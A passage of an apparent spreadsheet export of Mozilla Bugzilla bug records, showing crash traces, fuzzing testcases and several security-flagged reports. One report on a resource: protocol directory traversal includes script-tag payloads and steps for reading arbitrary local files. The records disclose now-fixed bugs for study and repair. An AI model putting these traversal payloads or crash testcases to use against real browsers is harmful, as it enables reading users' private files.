    #15 0x7f915bacac3b in nsThreadPool::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:305:14
    #16 0x7f915babd9f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1169:16
    #17 0x7f915bac76ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467:10
    #18 0x7f915cf4ee0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #19 0x7f915cdd91f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #20 0x7f915cdd91f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #21 0x7f915cdd91f1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #22 0x7f915bab6d7b in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
    #23 0x7f917722a09e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #24 0x7f9178b50608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608)
Thread T33 (MediaDe~hine #1) created by T0 (Web Content) here:
    #0 0x563dfcb8f61c in __interceptor_pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:207:3
    #1 0x7f917721a124 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f917720b3ce in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f915bab9bcd in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:607:18
    #4 0x7f915bac59cf in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:581:12
    #5 0x7f915bacfc31 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:163:57
    #6 0x7f915bac9859 in NS_NewNamedThread /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:155:10
    #7 0x7f915bac9859 in nsThreadPool::PutEvent(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:120:17
    #8 0x7f915bacbae9 in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:357:5
    #9 0x7f915baa0d23 in mozilla::TaskQueue::DispatchLocked(nsCOMPtr&lt;nsIRunnable&gt;&amp;, unsigned int, mozilla::AbstractThread::DispatchReason) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:68:26
    #10 0x7f915bad3933 in mozilla::TaskQueue::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, mozilla::AbstractThread::DispatchReason) /builds/worker/workspace/obj-build/dist/include/mozilla/TaskQueue.h:87:14
    #11 0x7f915ba95755 in mozilla::AutoTaskDispatcher::DispatchTaskGroup(mozilla::UniquePtr&lt;mozilla::AutoTaskDispatcher::PerThreadTaskGroup, mozilla::DefaultDelete&lt;mozilla::AutoTaskDispatcher::PerThreadTaskGroup&gt; &gt;) /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:275:20
    #12 0x7f915ba94b36 in mozilla::AutoTaskDispatcher::~AutoTaskDispatcher() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:121:7
    #13 0x7f915ba96ad9 in reset /builds/worker/workspace/obj-build/dist/include/mozilla/Maybe.h:639:19
    #14 0x7f915ba96ad9 in mozilla::XPCOMThreadWrapper::MaybeFireTailDispatcher() /builds/worker/checkouts/gecko/xpcom/threads/AbstractThread.cpp:195:23
    #15 0x7f915ba92fac in AfterProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/AbstractThread.cpp:133:5
    #16 0x7f915ba92fac in non-virtual thunk to mozilla::XPCOMThreadWrapper::AfterProcessNextEvent(nsIThreadInternal*, bool) /builds/worker/checkouts/gecko/xpcom/threads/AbstractThread.cpp
    #17 0x7f915babd537 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:3
    #18 0x7f915bac76ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467:10
    #19 0x7f915cf4d84f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #20 0x7f915cdd91f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #21 0x7f915cdd91f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #22 0x7f915cdd91f1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #23 0x7f91635d3567 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
    #24 0x7f916772a5df in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:917:20
    #25 0x7f915cdd91f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #26 0x7f915cdd91f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #27 0x7f915cdd91f1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #28 0x7f9167729851 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:749:34
    #29 0x563dfcbd987d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #30 0x563dfcbd9ca8 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327:18
    #31 0x7f917861d0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/media/mediasink/AudioSink.cpp:361:10 in mozilla::AudioSink::NotifyAudioNeeded()
Shadow bytes around the buggy address:
  0x0c3080002020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3080002030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3080002040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3080002050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3080002060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c3080002070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]
  0x0c3080002080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3080002090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c30800020a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c30800020b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c30800020c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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40332==ABORTING
This vuln is discovered by bo13oy of Cyber Kunlun Lab.
Thanks.</t>
        </is>
      </c>
      <c r="X5369" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5370">
      <c r="A5370" t="n">
        <v>843434</v>
      </c>
      <c r="B5370" t="inlineStr">
        <is>
          <t>2013-02-20 18:52:45 -0800</t>
        </is>
      </c>
      <c r="C5370" t="inlineStr">
        <is>
          <t>Assertion failure in nsUnicharStreamLoader::WriteSegmentFun with ISO-2022-JP</t>
        </is>
      </c>
      <c r="D5370" t="inlineStr">
        <is>
          <t>2013-11-25 16:41:13 -0800</t>
        </is>
      </c>
      <c r="E5370" t="n">
        <v>1</v>
      </c>
      <c r="F5370" t="n">
        <v>1</v>
      </c>
      <c r="G5370" t="n">
        <v>3</v>
      </c>
      <c r="H5370" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5370" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5370" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5370" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5370" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5370" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5370" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5370" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5370" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q5370" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5370" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5370" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T5370" t="n">
        <v>1</v>
      </c>
      <c r="U5370" t="n">
        <v>0</v>
      </c>
      <c r="V5370" t="n">
        <v>23</v>
      </c>
      <c r="W5370" t="inlineStr">
        <is>
          <t>Created attachment 716326
testcase
Assertion failure: ((bool)(__builtin_expect(!!(!NS_FAILED_impl(rv)), 1))), at netwerk/base/src/nsUnicharStreamLoader.cpp:218
  213	  DebugOnly&lt;nsresult&gt; rv =
  214	    self-&gt;mDecoder-&gt;Convert(aSegment,
  215	                            &amp;srcLen,
  216	                            self-&gt;mBuffer.BeginWriting() + haveRead,
  217	                            &amp;dstLen);
* 218	  MOZ_ASSERT(NS_SUCCEEDED(rv));
  219	  MOZ_ASSERT(srcLen == static_cast&lt;int32_t&gt;(aCount));
  220	  haveRead += dstLen;
  221
  222	  self-&gt;mBuffer.SetLength(haveRead);</t>
        </is>
      </c>
      <c r="X5370" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5371">
      <c r="A5371" t="n">
        <v>1182711</v>
      </c>
      <c r="B5371" t="inlineStr">
        <is>
          <t>2015-07-10 16:26:21 -0700</t>
        </is>
      </c>
      <c r="C5371" t="inlineStr">
        <is>
          <t>Crash [@ js::ScopeIter::operator++] or Assertion failure: ssi_.type() == StaticScopeIter&lt;CanGC&gt;::Function, at vm/ScopeObject.cpp</t>
        </is>
      </c>
      <c r="D5371" t="inlineStr">
        <is>
          <t>2016-07-02 10:54:02 -0700</t>
        </is>
      </c>
      <c r="E5371" t="n">
        <v>1</v>
      </c>
      <c r="F5371" t="n">
        <v>1</v>
      </c>
      <c r="G5371" t="n">
        <v>3</v>
      </c>
      <c r="H5371" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5371" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5371" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5371" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5371" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5371" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5371" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5371" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage][adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q5371" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5371" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5371" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5371" t="n">
        <v>1</v>
      </c>
      <c r="U5371" t="n">
        <v>0</v>
      </c>
      <c r="V5371" t="n">
        <v>29</v>
      </c>
      <c r="W5371" t="inlineStr">
        <is>
          <t>for (var a of [0]) {}
(function() {
    for (let b of [0]) {
        for (var c of null) {
            return;
            function f() {}
        }
    }
})()
asserts js debug shell on m-c changeset 7ec3e4b2a45f with --fuzzing-safe --no-threads --ion-eager at Assertion failure: ssi_.type() == StaticScopeIter&lt;CanGC&gt;::Function, at vm/ScopeObject.cpp and crashes opt shells at js::ScopeIter::operator++.
Debug configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/funfuzz/js/compileShell.py -b "--enable-debug --enable-more-deterministic --enable-nspr-build" -r 7ec3e4b2a45f
Opt configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --disable-debug --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/funfuzz/js/compileShell.py -b "--disable-debug --enable-more-deterministic --enable-nspr-build" -r 7ec3e4b2a45f
A bisection window is coming up. :bz, :jorendorff and :shu landed stuff in the window so setting needinfo? from Boris as a start.
Setting s-s to be safe, this may merely be a null deref. Please feel free to open it up if it is not s-s.</t>
        </is>
      </c>
      <c r="X5371" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5372">
      <c r="A5372" t="n">
        <v>624764</v>
      </c>
      <c r="B5372" t="inlineStr">
        <is>
          <t>2011-01-11 09:58:53 -0800</t>
        </is>
      </c>
      <c r="C5372" t="inlineStr">
        <is>
          <t>Directory Traversal in resource protocol</t>
        </is>
      </c>
      <c r="D5372" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:14 -0700</t>
        </is>
      </c>
      <c r="E5372" t="n">
        <v>1</v>
      </c>
      <c r="F5372" t="n">
        <v>1</v>
      </c>
      <c r="G5372" t="n">
        <v>3</v>
      </c>
      <c r="H5372" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5372" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5372" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5372" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5372" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5372" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5372" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5372" t="inlineStr">
        <is>
          <t>[sg:moderate?][hardblocker]</t>
        </is>
      </c>
      <c r="Q5372" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5372" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5372" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5372" t="n">
        <v>1</v>
      </c>
      <c r="U5372" t="n">
        <v>1</v>
      </c>
      <c r="V5372" t="n">
        <v>43</v>
      </c>
      <c r="W5372" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)
By using a semi-colon ";" character after the resource protocol, we can bypass the protections and use "\..\" in order to do directory traversal or use the colon ":" character.
It can be used for file/directory enumeration or including important javascript files in a script tag. For example for a windows box we can use:
&lt;script src="resource:///;\..\..\..\directory\secret.js"&gt;&lt;/script&gt;
Or
&lt;script src="resource:///;\..\..\..\directory\secret.js::$data"&gt;&lt;/script&gt;
Or
&lt;script src="resource:///something.com;\..\..\..\directory::$index_allocation\secret.js"&gt;&lt;/script&gt;
---
Linux box might be exploitable by: resource:///something.com;\\..\\..\\..\\ (as I haven't tried it in a Linux box yet)
Reproducible: Always
Steps to Reproduce:
1. In windows, Open the following URL by using Mozilla Firefox:
resource:///;\..\..\..\
2. You can see the root directory
Actual Results:  
You can see the root directory
Expected Results:  
I should be limited and get "access denied" for example
I just find this bug in 15 minutes, and I am reporting this immediately to you after finding it. Therefore, excuse me if I have any mistake in writing the report.</t>
        </is>
      </c>
      <c r="X5372" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5373">
      <c r="A5373" t="n">
        <v>899570</v>
      </c>
      <c r="B5373" t="inlineStr">
        <is>
          <t>2013-07-30 07:39:51 -0700</t>
        </is>
      </c>
      <c r="C5373" t="inlineStr">
        <is>
          <t>Run talos-mozharness for FF24</t>
        </is>
      </c>
      <c r="D5373" t="inlineStr">
        <is>
          <t>2014-07-09 10:11:58 -0700</t>
        </is>
      </c>
      <c r="E5373" t="n">
        <v>1</v>
      </c>
      <c r="F5373" t="n">
        <v>1</v>
      </c>
      <c r="G5373" t="n">
        <v>5</v>
      </c>
      <c r="H5373" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5373" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5373" t="inlineStr">
        <is>
          <t>Applications: MozharnessCore</t>
        </is>
      </c>
      <c r="K5373" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5373" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5373" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5373" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5373" t="inlineStr"/>
      <c r="Q5373" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5373" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5373" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5373" t="n">
        <v>1</v>
      </c>
      <c r="U5373" t="n">
        <v>0</v>
      </c>
      <c r="V5373" t="n">
        <v>8</v>
      </c>
      <c r="W5373" t="inlineStr">
        <is>
          <t>This way when ESR24 comes around we will be able to drop old talos once ESR17 goes away.
It's good that we uplifted all of our patches forward but we should test it on a disposable branch just to be sure.
Maybe I can just push mozilla-aurora to try and see what happens.</t>
        </is>
      </c>
      <c r="X5373" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5374">
      <c r="A5374" t="n">
        <v>271716</v>
      </c>
      <c r="B5374" t="inlineStr">
        <is>
          <t>2004-11-25 05:19:45 -0800</t>
        </is>
      </c>
      <c r="C5374" t="inlineStr">
        <is>
          <t>crash on infinite loop creating new arrays [@ JS_TypeOfValue]</t>
        </is>
      </c>
      <c r="D5374" t="inlineStr">
        <is>
          <t>2006-07-07 00:54:09 -0700</t>
        </is>
      </c>
      <c r="E5374" t="n">
        <v>1</v>
      </c>
      <c r="F5374" t="n">
        <v>1</v>
      </c>
      <c r="G5374" t="n">
        <v>3</v>
      </c>
      <c r="H5374" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5374" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5374" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5374" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5374" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5374" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5374" t="inlineStr"/>
      <c r="Q5374" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5374" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5374" t="inlineStr">
        <is>
          <t>mozilla1.8alpha6</t>
        </is>
      </c>
      <c r="T5374" t="n">
        <v>1</v>
      </c>
      <c r="U5374" t="n">
        <v>2</v>
      </c>
      <c r="V5374" t="n">
        <v>56</v>
      </c>
      <c r="W5374" t="inlineStr">
        <is>
          <t>cvs from yesterday. loading the attached testcase sometimes crashes (usually it
gives me the "do you want to abort" dialog, if I say no I get it again after
some time)
stack:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1081527136 (LWP 4345)]
0x40189139 in JS_TypeOfValue (cx=0x8c85500, v=147277832) at
/home/chb/mozilla/js/src/jsapi.c:608
608                 ops = obj-&gt;map-&gt;ops;
Current language:  auto; currently c
(gdb) bt
#0  0x40189139 in JS_TypeOfValue (cx=0x8c85500, v=147277832) at
/home/chb/mozilla/js/src/jsapi.c:608
#1  0x41610c9d in nsEventReceiverSH::SetProperty (this=0x8255890,
wrapper=0xae1e108, cx=0x8c85500, obj=0x8c73a98,
    id=137200692, vp=0xbfffdbac, _retval=0xbfffdafc) at
/home/chb/mozilla/dom/src/base/nsDOMClassInfo.cpp:5212
I'll attach the full stack as an attachment.
(gdb) print obj-&gt;map
$2 = (JSObjectMap *) 0x0
(gdb) print *obj
$3 = {map = 0x0, slots = 0x8c736b9}</t>
        </is>
      </c>
      <c r="X5374" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5375">
      <c r="A5375" t="n">
        <v>1554006</v>
      </c>
      <c r="B5375" t="inlineStr">
        <is>
          <t>2019-05-23 17:11:42 -0700</t>
        </is>
      </c>
      <c r="C5375" t="inlineStr">
        <is>
          <t>Update builders to rustc 1.35</t>
        </is>
      </c>
      <c r="D5375" t="inlineStr">
        <is>
          <t>2019-06-13 00:26:33 -0700</t>
        </is>
      </c>
      <c r="E5375" t="n">
        <v>1</v>
      </c>
      <c r="F5375" t="n">
        <v>1</v>
      </c>
      <c r="G5375" t="n">
        <v>7</v>
      </c>
      <c r="H5375" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5375" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5375" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5375" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5375" t="inlineStr"/>
      <c r="Q5375" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5375" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5375" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T5375" t="n">
        <v>1</v>
      </c>
      <c r="U5375" t="n">
        <v>0</v>
      </c>
      <c r="V5375" t="n">
        <v>14</v>
      </c>
      <c r="W5375" t="inlineStr">
        <is>
          <t>This released today.</t>
        </is>
      </c>
      <c r="X5375" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5376">
      <c r="A5376" t="n">
        <v>1472326</v>
      </c>
      <c r="B5376" t="inlineStr">
        <is>
          <t>2018-06-29 15:16:06 -0700</t>
        </is>
      </c>
      <c r="C5376" t="inlineStr">
        <is>
          <t>group member syncing is currently broken on production bmo</t>
        </is>
      </c>
      <c r="D5376" t="inlineStr">
        <is>
          <t>2018-07-03 11:50:59 -0700</t>
        </is>
      </c>
      <c r="E5376" t="n">
        <v>1</v>
      </c>
      <c r="F5376" t="n">
        <v>1</v>
      </c>
      <c r="G5376" t="n">
        <v>7</v>
      </c>
      <c r="H5376" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5376" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5376" t="inlineStr">
        <is>
          <t>Phabricator Integration</t>
        </is>
      </c>
      <c r="K5376" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5376" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5376" t="inlineStr"/>
      <c r="Q5376" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5376" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5376" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5376" t="n">
        <v>1</v>
      </c>
      <c r="U5376" t="n">
        <v>0</v>
      </c>
      <c r="V5376" t="n">
        <v>3</v>
      </c>
      <c r="W5376" t="inlineStr">
        <is>
          <t>editbugs-team and other groups that are syncing to phabricator prod are failing erratically and the member list is currently not complete. This is causing some to not be able to edit their own public phabricator revisions for example when we set the edit policy to editbugs-team. This is not failing locally or on bugzilla-dev and phabricator-dev.
Researching into what is causing this issue.</t>
        </is>
      </c>
      <c r="X5376" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5377">
      <c r="A5377" t="n">
        <v>1179139</v>
      </c>
      <c r="B5377" t="inlineStr">
        <is>
          <t>2015-07-01 00:54:42 -0700</t>
        </is>
      </c>
      <c r="C5377" t="inlineStr">
        <is>
          <t>Executive summary decoder needs to add submissionDate</t>
        </is>
      </c>
      <c r="D5377" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E5377" t="n">
        <v>1</v>
      </c>
      <c r="F5377" t="n">
        <v>1</v>
      </c>
      <c r="G5377" t="n">
        <v>6</v>
      </c>
      <c r="H5377" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5377" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J5377" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K5377" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5377" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5377" t="inlineStr">
        <is>
          <t>[unifiedTelemetry] [b5]</t>
        </is>
      </c>
      <c r="Q5377" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5377" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5377" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5377" t="n">
        <v>1</v>
      </c>
      <c r="U5377" t="n">
        <v>0</v>
      </c>
      <c r="V5377" t="n">
        <v>3</v>
      </c>
      <c r="W5377" t="inlineStr">
        <is>
          <t>We plan to store executive summary data by submissionDate in S3: https://github.com/mozilla-services/puppet-config/blob/master/pipeline/modules/pipeline/files/schema/schema.telemetry_executive_summary.json
The configured s3 output dumps everything in UNKNOWN because this field is missing (and is thus currently disabled).</t>
        </is>
      </c>
      <c r="X5377" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5378">
      <c r="A5378" t="n">
        <v>1488180</v>
      </c>
      <c r="B5378" t="inlineStr">
        <is>
          <t>2018-09-03 04:08:40 -0700</t>
        </is>
      </c>
      <c r="C5378" t="inlineStr">
        <is>
          <t>Extensions can load arbitrary URLs in new windows via "|" separators</t>
        </is>
      </c>
      <c r="D5378" t="inlineStr">
        <is>
          <t>2020-02-16 17:40:27 -0800</t>
        </is>
      </c>
      <c r="E5378" t="n">
        <v>1</v>
      </c>
      <c r="F5378" t="n">
        <v>1</v>
      </c>
      <c r="G5378" t="n">
        <v>3</v>
      </c>
      <c r="H5378" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5378" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5378" t="inlineStr">
        <is>
